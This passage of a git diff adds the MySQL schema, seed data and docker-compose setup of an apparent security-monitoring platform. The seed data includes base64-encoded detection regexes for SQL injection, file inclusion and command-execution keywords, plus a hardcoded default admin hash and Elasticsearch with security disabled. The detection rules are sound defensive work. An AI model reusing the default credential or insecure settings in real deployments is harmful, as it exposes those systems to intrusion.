`apps_createtime` datetime NOT NULL COMMENT '创建时间', + `apps_status` tinyint(1) DEFAULT '1' COMMENT '关联状态,0:取消,1:启用', + `apps_errormsg` varchar(255) DEFAULT NULL COMMENT '异常原因', + PRIMARY KEY (`id`) +) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='应用和站点关联配置表'; + +-- ---------------------------- +-- Table structure for w3_clouds_assets +-- ---------------------------- +DROP TABLE IF EXISTS `w3_clouds_assets`; +CREATE TABLE `w3_clouds_assets` ( + `id` bigint(20) NOT NULL AUTO_INCREMENT COMMENT 'id', + `cloud_assets_id` varchar(32) DEFAULT NULL COMMENT '云资产实例ID', + `cloud_assets_zone` varchar(30) DEFAULT NULL COMMENT '云资产归属可用区', + `cloud_assets_regions` varchar(30) DEFAULT NULL COMMENT '云资产归属地区', + `cloud_assets_config` varchar(68) DEFAULT NULL COMMENT '云资产配置', + `cloud_assets_intranet_ip` varchar(13) DEFAULT NULL COMMENT '云资产内网IP', + `cloud_assets_public_ip` varchar(13) DEFAULT NULL COMMENT '云资产外网IP', + `cloud_assets_instance_name` varchar(58) DEFAULT NULL COMMENT '云资产实例别名', + `cloud_assets_fingerprint` varchar(255) DEFAULT NULL COMMENT '云资产指纹,如系统版本', + `cloud_assets_createtime` datetime DEFAULT NULL COMMENT '云资产创建时间', + `cloud_assets_expiredtime` datetime DEFAULT NULL COMMENT '云资产释放时间', + `cloud_assets_updatetime` datetime DEFAULT NULL COMMENT '云资产更新时间', + `cloud_assets_securitygroup_id` varchar(255) DEFAULT NULL COMMENT '云资产安全组ID', + `cloud_assets_status` tinyint(1) DEFAULT '1' COMMENT '云资产原生状态,0:停用,1:运行中', + `cloud_assets_security_status` tinyint(1) DEFAULT '0' COMMENT '云资产安全状态,0:待检查,1:相对安全,2:不安全', + `cloud_assets_types` tinyint(1) DEFAULT '0' COMMENT '云资产类型,0:云主机,1:域名,2:redis,3:mysql,4:MariaDB,5:SQLServer,6:MongoDB', + `cloud_assets_ports` varchar(6) DEFAULT '1' COMMENT '云资产端口号', + `cloud_assets_simple_name` varchar(255) DEFAULT '1' COMMENT '云资产通用字段', + `cloud_assets_delete` tinyint(1) DEFAULT '1' COMMENT '云资产删除,0:删除,1:正常', + PRIMARY KEY (`id`) +) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='云资产数据'; + +-- ---------------------------- +-- Table structure for w3_clouds_secrets +-- ---------------------------- +DROP TABLE IF EXISTS `w3_clouds_secrets`; +CREATE TABLE `w3_clouds_secrets` ( + `id` bigint(20) NOT NULL AUTO_INCREMENT COMMENT 'id', + `cloud_secret_type` tinyint(1) NOT NULL COMMENT '云厂商类型,0:阿里云,1:腾讯云,2:华为云', + `cloud_access_key` varchar(255) NOT NULL COMMENT 'AccessKeyId', + `cloud_access_token` varchar(255) NOT NULL COMMENT 'AccessSecret', + `cloud_secret_status` tinyint(1) DEFAULT '1' COMMENT '状态,0:停用,1:启用', + `cloud_secret_delete` tinyint(1) DEFAULT '1' COMMENT '删除状态,0:删除,1:启用', + `cloud_secret_create_userid` bigint(20) NOT NULL COMMENT '创建的用户ID', + `cloud_secret_updatetime` datetime DEFAULT NULL COMMENT '更新时间', + `cloud_secret_createtime` datetime NOT NULL COMMENT '创建时间', + `cloud_secret_errormsg` varchar(255) DEFAULT NULL COMMENT '异常原因', + `cloud_secret_info` varchar(20) NOT NULL COMMENT '备注', + PRIMARY KEY (`id`) +) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8 COMMENT='云厂商配置'; + +-- ---------------------------- +-- Table structure for w3_gitlab_config +-- ---------------------------- +DROP TABLE IF EXISTS `w3_gitlab_config`; +CREATE TABLE `w3_gitlab_config` ( + `id` bigint(20) NOT NULL AUTO_INCREMENT COMMENT 'id', + `gitlab_config_addr` varchar(255) NOT NULL COMMENT 'gitlab/GITHUB主地址', + `gitlab_config_username` varchar(255) NOT NULL COMMENT '账号', + `gitlab_config_token` varchar(255) NOT NULL COMMENT 'token值', + `gitlab_config_password` varchar(255) DEFAULT '1' COMMENT '密码', + `gitlab_config_status` tinyint(1) DEFAULT '1' COMMENT '状态,0:停用,1:启用', + `gitlab_config_delete_status` tinyint(1) DEFAULT '1' COMMENT '删除状态,0:删除,1:启用', + `gitlab_create_userid` bigint(20) NOT NULL COMMENT '创建的用户ID', + `gitlab_config_updatetime` datetime DEFAULT NULL COMMENT '更新时间', + `gitlab_config_createtime` datetime NOT NULL COMMENT '创建时间', + `gitlab_config_errormsg` varchar(255) DEFAULT NULL COMMENT '异常原因', + PRIMARY KEY (`id`) +) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='git配置'; + +-- ---------------------------- +-- Table structure for w3_kubernetes_assets +-- ---------------------------- +DROP TABLE IF EXISTS `w3_kubernetes_assets`; +CREATE TABLE `w3_kubernetes_assets` ( + `id` bigint(20) NOT NULL AUTO_INCREMENT COMMENT 'id', + `kubernetes_id` bigint(20) NOT NULL COMMENT '集群配置的ID', + `kubernetes_service_name` varchar(255) NOT NULL COMMENT '集群服务名称', + `kubernetes_namespace` varchar(255) NOT NULL COMMENT '集群namespace', + `kubernetes_tags` varchar(255) DEFAULT NULL COMMENT '集群服务的tags', + `kubernetes_service_updatetime` datetime DEFAULT NULL COMMENT '更新时间', + `kubernetes_service_createtime` datetime NOT NULL COMMENT '创建时间', + `kubernetes_service_delete` tinyint(1) DEFAULT '1' COMMENT '删除状态,0:删除,1:启用', + PRIMARY KEY (`id`) +) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='K8S集群抓取的资产数据'; + +-- ---------------------------- +-- Table structure for w3_kubernetes_config +-- ---------------------------- +DROP TABLE IF EXISTS `w3_kubernetes_config`; +CREATE TABLE `w3_kubernetes_config` ( + `id` bigint(20) NOT NULL AUTO_INCREMENT COMMENT 'id', + `kubernetes_config_kub` varchar(255) DEFAULT '1' COMMENT 'kubeconfig配置', + `kubernetes_config_status` tinyint(1) DEFAULT '1' COMMENT '状态,0:停用,1:启用', + `kubernetes_config_delete_status` tinyint(1) DEFAULT '1' COMMENT '删除状态,0:删除,1:启用', + `kubernetes_config_updatetime` datetime DEFAULT NULL COMMENT '更新时间', + `kubernetes_config_createtime` datetime NOT NULL COMMENT '创建时间', + `kubernetes_create_userid` bigint(20) NOT NULL COMMENT '创建的用户ID', + `kubernetes_config_errormsg` varchar(255) DEFAULT NULL COMMENT '异常原因', + PRIMARY KEY (`id`) +) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='kubernetes配置'; + +-- ---------------------------- +-- Table structure for w3_license +-- ---------------------------- +DROP TABLE IF EXISTS `w3_license`; +CREATE TABLE `w3_license` ( + `id` tinyint(1) NOT NULL AUTO_INCREMENT COMMENT 'id', + `license_type` tinyint(1) DEFAULT '1' COMMENT '类型,1:License版本,2:License内容', + `lincese_info` char(32) DEFAULT '' COMMENT 'License内容', + PRIMARY KEY (`id`) +) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8 COMMENT='License管理'; + +-- ---------------------------- +-- Table structure for w3_secrets +-- ---------------------------- +DROP TABLE IF EXISTS `w3_secrets`; +CREATE TABLE `w3_secrets` ( + `id` bigint(20) NOT NULL AUTO_INCREMENT COMMENT 'id', + `secret_name` varchar(68) NOT NULL COMMENT '授权备注', + `access_key` varchar(50) NOT NULL COMMENT 'AccessKeyId', + `access_token` varchar(50) NOT NULL COMMENT 'AccessSecret', + `secret_status` tinyint(1) DEFAULT '1' COMMENT '状态,0:停用,1:启用', + `secret_delete` tinyint(1) DEFAULT '1' COMMENT '删除状态,0:删除,1:启用', + `secret_create_userid` bigint(20) NOT NULL COMMENT '归属用户的ID', + `secret_updatetime` datetime DEFAULT NULL COMMENT '更新时间', + `secret_createtime` datetime NOT NULL COMMENT '创建时间', + PRIMARY KEY (`id`) +) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8 COMMENT='授权秘钥管理'; + +-- ---------------------------- +-- Table structure for w3_spider_config +-- ---------------------------- +DROP TABLE IF EXISTS `w3_spider_config`; +CREATE TABLE `w3_spider_config` ( + `id` bigint(20) NOT NULL AUTO_INCREMENT COMMENT 'id', + `spider_config` tinyint(1) DEFAULT '0' COMMENT '抓取类型,0:云上资产,1:K8S数据,2:Git数据', + `spider_crontab_type` tinyint(1) DEFAULT '0' COMMENT '抓取频率,0:每分钟,1:每小时,2:每天', + `spider_id` bigint(20) NOT NULL COMMENT '对应的ID', + `spider_status` tinyint(1) DEFAULT '1' COMMENT '抓取状态,0:删除,1:启用', + `spider_updatetime` datetime DEFAULT NULL COMMENT '更新时间', + `spider_createtime` datetime NOT NULL COMMENT '创建时间', + `spider_delete` tinyint(1) DEFAULT '1' COMMENT '删除状态,0:删除,1:启用', + `spider_create_userid` bigint(20) NOT NULL COMMENT '创建的用户ID', + PRIMARY KEY (`id`) +) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8 COMMENT='抓取配置表'; + +-- ---------------------------- +-- Table structure for w3_statistics +-- ---------------------------- +DROP TABLE IF EXISTS `w3_statistics`; +CREATE TABLE `w3_statistics` ( + `id` bigint(20) NOT NULL AUTO_INCREMENT COMMENT 'id', + `statis_uptime` datetime DEFAULT NULL COMMENT '创建/更新时间', + `statis_type` tinyint(1) DEFAULT '0' COMMENT '类型,0:审计日志数、1:识别攻击数、2:审计网络请求数,3:识别网络风险数', + `statis_counts` bigint(20) DEFAULT '0' COMMENT '统计数', + `website_id` bigint(20) NOT NULL COMMENT '站点归属ID', + PRIMARY KEY (`id`) +) ENGINE=InnoDB AUTO_INCREMENT=8 DEFAULT CHARSET=utf8 COMMENT='数据统计表'; + +-- ---------------------------- +-- Table structure for w3_users +-- ---------------------------- +DROP TABLE IF EXISTS `w3_users`; +CREATE TABLE `w3_users` ( + `user_id` bigint(20) NOT NULL AUTO_INCREMENT COMMENT 'id', + `user_name` varchar(25) NOT NULL COMMENT '用户名', + `user_password` char(32) NOT NULL COMMENT '密码', + `user_createtime` datetime NOT NULL COMMENT '创建时间', + `user_updatetime` datetime DEFAULT NULL COMMENT '最后更新/登录时间', + `user_status` tinyint(1) DEFAULT '1' COMMENT '规则状态,0:禁用,1:启用', + `user_delete` tinyint(1) DEFAULT '1' COMMENT '逻辑删除状态,0:已删除,1:启用', + PRIMARY KEY (`user_id`) +) ENGINE=InnoDB AUTO_INCREMENT=17 DEFAULT CHARSET=utf8 COMMENT='用户表'; + +-- ---------------------------- +-- Table structure for w3_vuls_circulation +-- ---------------------------- +DROP TABLE IF EXISTS `w3_vuls_circulation`; +CREATE TABLE `w3_vuls_circulation` ( + `id` bigint(20) NOT NULL AUTO_INCREMENT COMMENT 'id', + `vid` bigint(20) NOT NULL COMMENT 'id', + `vul_circulation_createtime` datetime NOT NULL COMMENT '流转时间', + `vul_dispose_status` tinyint(1) DEFAULT '0' COMMENT '处置状态,0:待处理,1:解决中,2:误报忽略,3:已解决,4:白名单,5:无效单,6:修改', + `vul_circulation_info` varchar(255) DEFAULT '暂无' COMMENT '流转信息', + PRIMARY KEY (`id`) +) ENGINE=InnoDB AUTO_INCREMENT=75 DEFAULT CHARSET=utf8 COMMENT='漏洞管理.流转单'; + +-- ---------------------------- +-- Table structure for w3_vuls_service +-- ---------------------------- +DROP TABLE IF EXISTS `w3_vuls_service`; +CREATE TABLE `w3_vuls_service` ( + `id` bigint(20) NOT NULL AUTO_INCREMENT COMMENT 'id', + `vul_id` varchar(25) NOT NULL COMMENT '漏洞编号', + `vul_name` varchar(255) DEFAULT '' COMMENT '漏洞名称', + `vul_createtime` datetime NOT NULL COMMENT '创建时间', + `vul_updatetime` datetime DEFAULT NULL COMMENT '更新时间', + `vul_solvetime` datetime DEFAULT NULL COMMENT '解决时间', + `vul_info` longtext NOT NULL COMMENT '漏洞信息', + `vul_suggestion` longtext COMMENT '解决建议', + `vul_referer` longtext COMMENT '引用参考', + `vul_level` tinyint(1) DEFAULT '0' COMMENT '漏洞级别,0:低危,1:中危,2:高危', + `vul_source` tinyint(1) DEFAULT '0' COMMENT '漏洞来源,0:内部,1:第三方', + `vul_source_object` tinyint(1) DEFAULT '0' COMMENT '漏洞来源对象,0:人工,1:工具检测,2:公司名,3:白帽子', + `vul_source_info` varchar(255) DEFAULT NULL COMMENT '漏洞来源对象内容', + `vul_dispose_status` tinyint(1) DEFAULT '0' COMMENT '处置状态,0:待处理,1:解决中,2:误报忽略,3:已解决,4:白名单', + `vul_circulation` tinyint(1) DEFAULT '0' COMMENT '内部流转,0:未接入,1:接入', + `vul_delete` tinyint(1) DEFAULT '1' COMMENT '逻辑删除,0:已删除,1:正常', + `vul_tags` varchar(255) DEFAULT '' COMMENT '漏洞标签,用,号分开', + `vul_uuid` bigint(20) DEFAULT '0' COMMENT '漏洞创建人,如果是工具,默认为0', + `vul_hosts` bigint(20) NOT NULL COMMENT '漏洞归属站点的ID', + PRIMARY KEY (`id`,`vul_id`) +) ENGINE=InnoDB AUTO_INCREMENT=13 DEFAULT CHARSET=utf8 COMMENT='漏洞管理'; + +-- ---------------------------- +-- Table structure for w3_vuls_tags +-- ---------------------------- +DROP TABLE IF EXISTS `w3_vuls_tags`; +CREATE TABLE `w3_vuls_tags` ( + `id` bigint(20) NOT NULL AUTO_INCREMENT COMMENT 'id', + `vul_tags` varchar(30) NOT NULL COMMENT '漏洞标签', + PRIMARY KEY (`id`) +) ENGINE=InnoDB AUTO_INCREMENT=18 DEFAULT CHARSET=utf8 COMMENT='漏洞管理.风险标签'; + +-- ---------------------------- +-- Table structure for w3_web_attack_rules +-- ---------------------------- +DROP TABLE IF EXISTS `w3_web_attack_rules`; +CREATE TABLE `w3_web_attack_rules` ( + `id` bigint(20) NOT NULL AUTO_INCREMENT COMMENT '规则id', + `rules_name` varchar(50) NOT NULL COMMENT '规则名称', + `rules_level` tinyint(1) DEFAULT '0' COMMENT '风险级别,0:低危,1:中危,2:高危', + `rules_trigger_count` bigint(20) DEFAULT '0' COMMENT '触发量', + `rules_createtime` datetime NOT NULL COMMENT '创建时间', + `rules_updatetime` datetime DEFAULT NULL COMMENT '更新时间', + `rules_status` tinyint(1) DEFAULT '0' COMMENT '规则状态,0:待启用,1:启用,2:禁用,3:异常', + `rules_delete` tinyint(1) DEFAULT '1' COMMENT '逻辑删除状态,0:已删除,1:启用', + `rules_regex` longtext NOT NULL COMMENT '规则内容', + PRIMARY KEY (`id`) +) ENGINE=InnoDB AUTO_INCREMENT=12 DEFAULT CHARSET=utf8 COMMENT='web检测规则'; + +-- ---------------------------- +-- Table structure for w3_web_attacks +-- ---------------------------- +DROP TABLE IF EXISTS `w3_web_attacks`; +CREATE TABLE `w3_web_attacks` ( + `attack_id` bigint(20) NOT NULL AUTO_INCREMENT COMMENT 'id', + `attack_createtime` datetime NOT NULL COMMENT '事件时间', + `attack_method` tinyint(1) NOT NULL COMMENT '事件请求类型,0:GET,1:POST,2:PUT,3:DELETE,4:HEAD,5:OPTIONS,6:TRACE,7:CONNECT,8:PATCH', + `attack_source_ip` varchar(15) NOT NULL COMMENT '事件源IP', + `attack_risk_level` tinyint(1) NOT NULL COMMENT '风险等级,0:低危,1:中危,2:高危,3:严重', + `attack_hosts` varchar(255) DEFAULT '' COMMENT '目标业务', + `attack_rules_id` bigint(20) NOT NULL COMMENT '攻击规则的ID', + `attack_http_code` varchar(4) NOT NULL COMMENT '响应头', + `attack_referer` varchar(255) DEFAULT '' COMMENT '请求referer来源', + `attack_ua` text COMMENT 'Useragent', + `attack_path` text COMMENT '攻击路径', + `attack_body` text COMMENT 'POST请求的内容', + `attack_sent_bytes` int(11) DEFAULT '0' COMMENT '报文大小', + `attack_sent_time` varchar(15) DEFAULT '0.000' COMMENT '请求耗时', + `attack_effective` tinyint(1) DEFAULT '0' COMMENT '处置状态,0:待处置,1:确认攻击,2:确认误报', + `attack_area` varchar(10) DEFAULT '未知' COMMENT '归属地区', + `attack_judge` varchar(255) DEFAULT '暂无' COMMENT '判定备注', + PRIMARY KEY (`attack_id`) +) ENGINE=InnoDB AUTO_INCREMENT=12265 DEFAULT CHARSET=utf8 COMMENT='攻击日志信息'; + +-- ---------------------------- +-- Table structure for w3_web_attacks_circulation +-- ---------------------------- +DROP TABLE IF EXISTS `w3_web_attacks_circulation`; +CREATE TABLE `w3_web_attacks_circulation` ( + `id` bigint(20) NOT NULL AUTO_INCREMENT COMMENT 'id', + `attack_id` bigint(20) NOT NULL COMMENT 'id', + `attack_circulation_createtime` datetime NOT NULL COMMENT '流转时间', + `attack_circulation_logs` varchar(255) DEFAULT '暂无' COMMENT '流转信息', + PRIMARY KEY (`id`) +) ENGINE=InnoDB AUTO_INCREMENT=12275 DEFAULT CHARSET=utf8 COMMENT='攻击日志信息.流转单'; + +-- ---------------------------- +-- Table structure for w3_website +-- ---------------------------- +DROP TABLE IF EXISTS `w3_website`; +CREATE TABLE `w3_website` ( + `id` bigint(20) NOT NULL AUTO_INCREMENT COMMENT 'id', + `website_name` char(100) NOT NULL COMMENT '站点应用名称', + `website_domain` char(100) NOT NULL COMMENT '站点域名', + `website_info` char(100) DEFAULT NULL COMMENT '站点应用备注', + `website_createtime` datetime NOT NULL COMMENT '创建时间', + `website_updatetime` datetime DEFAULT NULL COMMENT '更新时间', + `website_delete` tinyint(1) DEFAULT '1' COMMENT '逻辑删除,0:删除,1:可用', + PRIMARY KEY (`id`) +) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=utf8 COMMENT='站点管理'; + +-- ---------------------------- +-- Table structure for w3_website_config +-- ---------------------------- +DROP TABLE IF EXISTS `w3_website_config`; +CREATE TABLE `w3_website_config` ( + `id` bigint(20) NOT NULL COMMENT 'id', + `website_log_ipdomain` varchar(100) NOT NULL COMMENT 'ES的IP或域名', + `website_log_port` int(11) DEFAULT '0' COMMENT 'ES的端口', + `website_log_protype` tinyint(1) DEFAULT '0' COMMENT 'ES的协议,HTTP/HTTPS', + `website_log_idslog_index` varchar(100) DEFAULT NULL COMMENT 'ids日志索引', + `website_log_weblog_index` varchar(100) DEFAULT NULL COMMENT 'web日志索引', + `website_createtime` datetime NOT NULL COMMENT '创建时间', + `website_updatetime` datetime DEFAULT NULL COMMENT '更新时间', + PRIMARY KEY (`id`,`website_log_ipdomain`) +) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='站点管理.配置站点'; + +-- ---------------------------- +-- Table structure for w3_website_service +-- ---------------------------- +DROP TABLE IF EXISTS `w3_website_service`; +CREATE TABLE `w3_website_service` ( + `id` bigint(20) NOT NULL COMMENT 'id', + `website_types` tinyint(1) NOT NULL DEFAULT '0' COMMENT '服务开启类型,0:可用性监控,1:流量监控,2:篡改监控,3:Web日志监控', + `website_createtime` datetime NOT NULL COMMENT '创建时间', + `website_updatetime` datetime DEFAULT NULL COMMENT '更新时间', + PRIMARY KEY (`id`,`website_types`) +) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='站点管理.服务配置'; + +-- ---------------------------- +-- Table structure for w3_webscan_base_config +-- ---------------------------- +DROP TABLE IF EXISTS `w3_webscan_base_config`; +CREATE TABLE `w3_webscan_base_config` ( + `id` bigint(20) NOT NULL AUTO_INCREMENT COMMENT 'id', + `webscan_config_string_info` text COMMENT '配置内容(字符串型)', + `webscan_config_type` tinyint(1) DEFAULT '0' COMMENT '配置类型,0:爬取深度,1:扫描并发数,2:扫描请求useragent,3:扫描插件,4:云翻译', + `webscan_config_int_info` int(11) DEFAULT '0' COMMENT '配置内容(数字型)', + `webscan_config_updatetime` datetime DEFAULT NULL COMMENT '配置创建/更新时间', + PRIMARY KEY (`id`) +) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='web扫描设置'; + + +/** + * 初始化数据 + */ +-- ---------------------------- +-- License管理(默认都是社区版) +-- ---------------------------- +INSERT INTO `w3a_soc`.`w3_license`(`id`, `license_type`, `lincese_info`) VALUES (1, 1, '社区版'); +INSERT INTO `w3a_soc`.`w3_license`(`id`, `license_type`, `lincese_info`) VALUES (2, 2, '无'); +-- ---------------------------- +-- 创建测试账号密码 +-- ---------------------------- +INSERT INTO `w3a_soc`.`w3_users`(`user_name`,`user_password`,`user_createtime`)VALUES('admin','385ba8ba360a0efbf17c93784323f655', now()); +-- ---------------------------- +-- ---------------------------- +-- 创建测试规则数据 +-- ---------------------------- +INSERT INTO `w3a_soc`.`w3_web_attack_rules`(`id`, `rules_name`, `rules_level`, `rules_trigger_count`, `rules_createtime`, `rules_updatetime`, `rules_status`, `rules_delete`, `rules_regex`) VALUES (1, 'SQL注入-探测', 2, 0, now(), NULL, 1, 1, 'KD9pKShhbmR8b3IpKC4qKVxkPVxk'); +INSERT INTO `w3a_soc`.`w3_web_attack_rules`(`id`, `rules_name`, `rules_level`, `rules_trigger_count`, `rules_createtime`, `rules_updatetime`, `rules_status`, `rules_delete`, `rules_regex`) VALUES (2, 'PHP敏感目录扫描', 0, 0, now(), NULL, 1, 1, 'KD9pKSh3cC1sb2dpbnxjbWR8YWRtaW58cGhwaW5mbylcLnBocA=='); +INSERT INTO `w3a_soc`.`w3_web_attack_rules`(`id`, `rules_name`, `rules_level`, `rules_trigger_count`, `rules_createtime`, `rules_updatetime`, `rules_status`, `rules_delete`, `rules_regex`) VALUES (3, '链路跟踪探针探测', 0, 0, now(), NULL, 1, 1, 'KD9pKSh0cmFjZXx0cmFjZWluZyk='); +INSERT INTO `w3a_soc`.`w3_web_attack_rules`(`id`, `rules_name`, `rules_level`, `rules_trigger_count`, `rules_createtime`, `rules_updatetime`, `rules_status`, `rules_delete`, `rules_regex`) VALUES (4, 'SQL注入-UNION', 2, 0, now(), NULL, 1, 1, 'KC4qKSg/aSkodW5pb24pKC4qKSg/aSkoc2VsZWN0KQ=='); +INSERT INTO `w3a_soc`.`w3_web_attack_rules`(`id`, `rules_name`, `rules_level`, `rules_trigger_count`, `rules_createtime`, `rules_updatetime`, `rules_status`, `rules_delete`, `rules_regex`) VALUES (5, 'composer文件泄露探测', 0, 0, now(), NULL, 1, 1, 'KD9pKVwuKGNvbXBvc2VyXC9jb21wb3NlclwuanNvbik='); +INSERT INTO `w3a_soc`.`w3_web_attack_rules`(`id`, `rules_name`, `rules_level`, `rules_trigger_count`, `rules_createtime`, `rules_updatetime`, `rules_status`, `rules_delete`, `rules_regex`) VALUES (6, 'Jira版本探测', 0, 0, now(), NULL, 1, 1, 'XC8oP2kpc2VjdXJlXC8oP2kpRGFzaGJvYXJkXC5qc3Bh'); +INSERT INTO `w3a_soc`.`w3_web_attack_rules`(`id`, `rules_name`, `rules_level`, `rules_trigger_count`, `rules_createtime`, `rules_updatetime`, `rules_status`, `rules_delete`, `rules_regex`) VALUES (7, '后门地址', 1, 0, now(), NULL, 1, 1, 'KD9pKShjbWR8YmFja2Rvb3J8MXx0ZXN0fHBocGluZm98cGhwfGpzcClcLihwaHB8anNwfGFzcHh8YXNwKQ=='); +INSERT INTO `w3a_soc`.`w3_web_attack_rules`(`id`, `rules_name`, `rules_level`, `rules_trigger_count`, `rules_createtime`, `rules_updatetime`, `rules_status`, `rules_delete`, `rules_regex`) VALUES (8, '本地文件包含', 2, 0, now(), NULL, 1, 1, 'XC8oP2kpKGV0Y3xwYXNzd2R8d2luZG93c1wvd2luKQ=='); +INSERT INTO `w3a_soc`.`w3_web_attack_rules`(`id`, `rules_name`, `rules_level`, `rules_trigger_count`, `rules_createtime`, `rules_updatetime`, `rules_status`, `rules_delete`, `rules_regex`) VALUES (9, '远程命令执行', 2, 0, now(), NULL, 1, 1, 'KD9pKShkZWZpbmV8ZXZhbHxmaWxlX2dldF9jb250ZW50c3xpbmNsdWRlfHJlcXVpcmV8cmVxdWlyZV9vbmNlfHNoZWxsX2V4ZWN8cGhwaW5mb3xzeXN0ZW18cGFzc3RocnV8Y2hhcnxjaHJ8ZXhlY3V0ZXxlY2hvfHByaW50fHByaW50X3J8dmFyX2R1bXB8b3BlbikoLiop'); +INSERT INTO `w3a_soc`.`w3_web_attack_rules`(`id`, `rules_name`, `rules_level`, `rules_trigger_count`, `rules_createtime`, `rules_updatetime`, `rules_status`, `rules_delete`, `rules_regex`) VALUES (10, '弱口令探测', 2, 0, now(), NULL, 1, 1, 'KD9pKShwYXNzd29yZHxwYXNzfHBhc3N3ZHxwd2R8cGR8dXNlcnB3ZHx1c2VycGFzc3x1c2VycGFzc3dkfHVzZXJwYXNzd29yZHxwYXNzX3dvcmR8dXNlcl9wYXNzd29yZHx1c2VyX3Bhc3MpXD0oP2kpKGFkbWlufGFkbWluMTIzfGFkbWluMTIzNDU2fDEyMzQ1NnxhZG1pbjg4OHxhZG1pbjg4ODh8dGVzdHwxMjM0fDEyM3x0ZXN0MTIzKQ=='); +INSERT INTO `w3a_soc`.`w3_web_attack_rules`(`id`, `rules_name`, `rules_level`, `rules_trigger_count`, `rules_createtime`, `rules_updatetime`, `rules_status`, `rules_delete`, `rules_regex`) VALUES (11, 'XSS跨站脚本攻击', 2, 0, now(), NULL, 1, 1, 'XDwoP2kpc2NyaXB0XD4oP2kpYWxlcnRcKCguKilcKVw8XC8oP2kpc2NyaXB0XD4='); + +-- ---------------------------- +-- web漏洞扫描 +-- ---------------------------- +INSERT INTO `w3a_soc`.`w3_webscan_base_config`(`id`, `webscan_config_string_info`, `webscan_config_type`, `webscan_config_int_info`, `webscan_config_updatetime`) VALUES (1, 'allowed_methods, backdoors, backup_directories, backup_files, captcha, code_injection, code_injection_php_input_wrapper, code_injection_timing, common_admin_interfaces, common_directories, common_files, cookie_set_for_parent_domain, credit_card, csrf, cvs_svn_users, directory_listing, emails, file_inclusion, form_upload, hsts, htaccess_limit, html_objects, http_only_cookies, http_put, insecure_client_access_policy, insecure_cookies, insecure_cors_policy, insecure_cross_domain_policy_access, insecure_cross_domain_policy_headers, interesting_responses, ldap_injection, localstart_asp, mixed_resource, no_sql_injection, no_sql_injection_differential, origin_spoof_access_restriction_bypass, os_cmd_injection, os_cmd_injection_timing, password_autocomplete, path_traversal, private_ip, response_splitting, rfi, session_fixation, source_code_disclosure, sql_injection, sql_injection_differential, sql_injection_timing, ssn, trainer, unencrypted_password_forms, unvalidated_redirect, unvalidated_redirect_dom, webdav, x_frame_options, xpath_injection, xss, xss_dom, xss_dom_script_context, xss_event, xss_path, xss_script_context, xss_tag, xst, xxe', 3, 0, now()); +INSERT INTO `w3a_soc`.`w3_webscan_base_config`(`id`, `webscan_config_string_info`, `webscan_config_type`, `webscan_config_int_info`, `webscan_config_updatetime`) VALUES (2, NULL, 0, 4, now()); +INSERT INTO `w3a_soc`.`w3_webscan_base_config`(`id`, `webscan_config_string_info`, `webscan_config_type`, `webscan_config_int_info`, `webscan_config_updatetime`) VALUES (3, NULL, 1, 10, now()); +INSERT INTO `w3a_soc`.`w3_webscan_base_config`(`id`, `webscan_config_string_info`, `webscan_config_type`, `webscan_config_int_info`, `webscan_config_updatetime`) VALUES (4, 'Baiduspider+(+http://www.baidu.com/search/spider.htm)', 2, 0, now()); +INSERT INTO `w3a_soc`.`w3_webscan_base_config`(`id`, `webscan_config_string_info`, `webscan_config_type`, `webscan_config_int_info`, `webscan_config_updatetime`) VALUES (5, NULL, 4, 0, now()); + +SET FOREIGN_KEY_CHECKS = 1; diff --git a/deploy/docker-compose-x86_64/docker-compose.yml b/deploy/docker-compose-x86_64/docker-compose.yml new file mode 100644 index 0000000..288946c --- /dev/null +++ b/deploy/docker-compose-x86_64/docker-compose.yml @@ -0,0 +1,208 @@ +version: '2' + +services: + # 业务端产出日志 + nginx: + image: openresty/openresty:alpine + volumes: + - ./web/log:/usr/local/openresty/nginx/logs + #- ./web/app:/app + - ./nginx.conf:/usr/local/openresty/nginx/conf/nginx.conf + ports: + - "80:8080" + + # 采集业务端日志到KAFKA + filebeat1: + image: docker.elastic.co/beats/filebeat:8.1.3 + entrypoint: "filebeat -e -strict.perms=false" + volumes: + - ./filebeat-nginx.yml:/usr/share/filebeat/filebeat.yml + - ./web/log:/var/log/nginx + depends_on: + - nginx + + # kafka & zookeeper + zookeeper: + image: docker.io/bitnami/zookeeper:3.8 + ports: + - "2181:2181" +# volumes: +# - "./zookeeper_data:/bitnami" + environment: + - ALLOW_ANONYMOUS_LOGIN=yes + kafka: + image: docker.io/bitnami/kafka:3.1 + ports: + - "29092:29092" + - "9092:9092" +# volumes: +# - "./kafka_data:/bitnami" + environment: + - KAFKA_CFG_ZOOKEEPER_CONNECT=zookeeper:2181 + - ALLOW_PLAINTEXT_LISTENER=yes + # 对外提供服务,不然会出现no such host!这个是非常贵的教训 + #- KAFKA_CFG_LISTENER_SECURITY_PROTOCOL_MAP=PLAINTEXT:PLAINTEXT,PLAINTEXT_HOST:PLAINTEXT + #- KAFKA_CFG_LISTENERS=PLAINTEXT://:9092,PLAINTEXT_HOST://:29092 + #- KAFKA_CFG_ADVERTISED_LISTENERS=PLAINTEXT://kafka:9092,PLAINTEXT_HOST://localhost:29092 + depends_on: + - zookeeper + + # 采集KAFKA日志到es + filebeat2: + image: docker.elastic.co/beats/filebeat:8.1.3 + entrypoint: "filebeat -e -strict.perms=false" + volumes: + - ./filebeat-kafka.yml:/usr/share/filebeat/filebeat.yml + depends_on: + - kafka + + # ES检索 + elasticsearch: + image: docker.elastic.co/elasticsearch/elasticsearch:8.1.3-arm64 + ports: + - '9200:9200' + - '9300:9300' + environment: + - discovery.type=single-node + - xpack.security.http.ssl.enabled=false + - xpack.security.enabled=false + - xpack.security.transport.ssl.enabled=false + - "ES_JAVA_OPTS=-Xms512m -Xmx2g" +# volumes: +# - './esdata:/bitnami/elasticsearch/data' + + #用于debug用 + kibana: + image: docker.elastic.co/kibana/kibana:8.1.3-arm64 + ports: 